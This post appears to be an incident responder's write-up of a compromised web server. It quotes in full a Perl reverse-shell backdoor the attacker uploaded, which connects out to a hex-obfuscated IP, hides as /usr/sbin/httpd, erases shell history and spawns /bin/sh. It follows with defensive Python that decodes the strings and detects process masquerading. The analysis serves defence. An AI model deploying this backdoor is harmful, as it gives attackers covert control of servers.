A hacker uploaded and attempted to execute this script on a web server I was asked to look at (dc.txt was a reverse-shell Perl script). It wasn't until a little later that I realised how horribly flawed this script is. Only the first system() call attempts to copy the script to /tmp/dc.pl; the rest all refer to /tmp/dc.txt, which it then never tries to execute. So if system() is disabled in PHP, this hack will fail every time. Additionally, the only way this hack can work is if the hacker has already managed to upload his dc.txt script onto the server. Why does he bother copying it to /tmp?

Contents of b.php ---

Contents of dc.txt ---

#!/usr/bin/perl
use Socket;

# Hex-escaped to survive a casual grep: "\x38\x32..." is 82.165.177.13, "\x38\x30\x38\x30" is 8080
$perm="\x38\x32\x2e\x31\x36\x35\x2e\x31\x37\x37\x2e\x31\x33";
$port="\x38\x30\x38\x30";
# Process name the backdoor will masquerade as in ps output
$fake="/usr/sbin/httpd";
# An alternative call-back address can be passed on the command line
if ($ARGV[0]) { $perm=$ARGV[0]; }

$proto = getprotobyname('tcp') || die("[x] Error: getprotobyname()\n\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[x] Error: Socket()\n");
# Hand-packed sockaddr_in: family AF_INET (2), network-order port, 4-byte address, 8 bytes of padding
if (!connect(SERVER, pack "SnA4x8", 2, $port, inet_aton($perm))) { die("[x] Dc Failed..\n"); }

if (!fork()) {
  # Child: overwrite argv[0] so the process shows up as /usr/sbin/httpd
  $0=$fake."\0"x16;
  # Wire stdin/stdout/stderr to the connected socket
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");
  # Disable shell history for this session and remove any bash history files left in /tmp
  system("unset HISTFILE;unset HISTSIZE;unset HISTFILESIZE;HISTFILE=/dev/null;rm -rf /tmp/.bash_*");
  # Fingerprint the host for the attacker
  system("echo [--] Uname ; uname -a ; echo [--] Uptime ; uptime ; echo [--] Id ; id ; echo --- ConnectBack ------------------------------------------------------------------------");
  # Report which download tools are present for fetching further payloads
  if ((-x "/usr/bin/wget") && (-e "/usr/bin/wget")) { system("echo wGet: Yes"); }
  if ((-x "/usr/bin/curl") && (-e "/usr/bin/curl")) { system("echo Curl: Yes"); }
  if ((-x "/usr/bin/fetch") && (-e "/usr/bin/fetch")) { system("echo Fetch: Yes"); }
  if ((-x "/usr/bin/GET") && (-e "/usr/bin/GET")) { system("echo GET: Yes"); }
  if ((-x "/usr/bin/lwp-download") && (-e "/usr/bin/lwp-download")) { system("echo LWP: Yes"); }
  if ((-x "/usr/bin/lynx") && (-e "/usr/bin/lynx")) { system("echo Lynx: Yes"); }
  # Replace the child with a shell whose argv[0] is also the fake name
  exec {'/bin/sh'} $fake . "\0" x4;
  # Never reached after a successful exec, and $File is never assigned anywhere in the script
  unlink($File);
  exit(0);
}
print "[x] Dc Connected. :-) \n";
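Two things a responder wants from a script like this are the call-back address hidden in the hex-escaped strings and a way to spot the argv[0] masquerade ($0 set to /usr/sbin/httpd) on a live host. The following is an added example in Python, not the attacker's code and not part of the original write-up. The sample strings are copied from dc.txt above; the /proc snapshot is constructed for illustration, and the live snapshot_proc() helper assumes a Linux /proc layout (reading other users' exe links needs root).

```python
import os
import re

# Constructed sample: the obfuscated assignments as they appear in dc.txt.
SAMPLE = r'''
$perm="\x38\x32\x2e\x31\x36\x35\x2e\x31\x37\x37\x2e\x31\x33";
$port="\x38\x30\x38\x30";
$fake="/usr/sbin/httpd";
'''

# Matches $name="..."; where the value is plain text and/or \xHH escapes.
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"((?:\\x[0-9a-fA-F]{2}|[^"\\])*)"\s*;')


def decode_perl_hex(s: str) -> str:
    """Expand Perl-style \\xHH escapes into the characters they encode."""
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)


def extract_strings(src: str) -> dict:
    """Return {variable: decoded value} for every simple string assignment in src."""
    return {name: decode_perl_hex(val) for name, val in ASSIGN_RE.findall(src)}


# Constructed /proc-style snapshot: (pid, /proc/<pid>/cmdline, resolved /proc/<pid>/exe).
# 4471 is the Perl backdoor after $0=$fake; 4472 is the exec'd /bin/sh with the faked argv[0].
PROC_SNAPSHOT = [
    (1203, "/usr/sbin/httpd", "/usr/sbin/httpd"),
    (1204, "/usr/sbin/httpd", "/usr/sbin/httpd"),
    (4471, "/usr/sbin/httpd", "/usr/bin/perl"),
    (4472, "/usr/sbin/httpd", "/bin/sh"),
    (987, "/usr/bin/perl /usr/bin/spamassassin", "/usr/bin/perl"),
]


def find_masquerading(snapshot):
    """Flag processes whose argv[0] names a different binary than the one actually mapped as exe.

    Overwriting $0 changes what ps and /proc/<pid>/cmdline report, but not the
    /proc/<pid>/exe symlink, so a mismatch between the two is the tell.
    """
    hits = []
    for pid, cmdline, exe in snapshot:
        argv0 = cmdline.split()[0] if cmdline else ""
        if argv0 and os.path.basename(argv0) != os.path.basename(exe):
            hits.append((pid, argv0, exe))
    return hits


def snapshot_proc():
    """Live equivalent of PROC_SNAPSHOT for a Linux host (assumes /proc; skips unreadable pids)."""
    out = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode(errors="replace")
            exe = os.readlink(f"/proc/{entry}/exe")
        except OSError:
            continue
        out.append((int(entry), argv0, exe))
    return out


if __name__ == "__main__":
    print(extract_strings(SAMPLE))
    for pid, argv0, exe in find_masquerading(PROC_SNAPSHOT):
        print(f"pid {pid}: claims {argv0} but exe is {exe}")
```

Expect some benign mismatches on a real host (login shells with a leading "-" in argv[0], interpreters invoked by an unversioned name while exe resolves to a versioned binary), so treat a hit as a prompt to look at /proc/<pid>/fd for a socket connected to an unexpected address rather than as a verdict on its own.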